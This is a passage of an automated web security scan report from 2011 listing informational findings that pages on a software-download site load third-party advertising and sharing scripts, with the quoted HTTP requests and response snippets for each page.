Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1448. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1449. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1450. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1451. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1452. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1453. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1454. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1455. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1456. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1457. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1458. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1459. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1460. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1461. http://www.x64bitdownload.com/drivers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /drivers/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1462. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /drivers/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
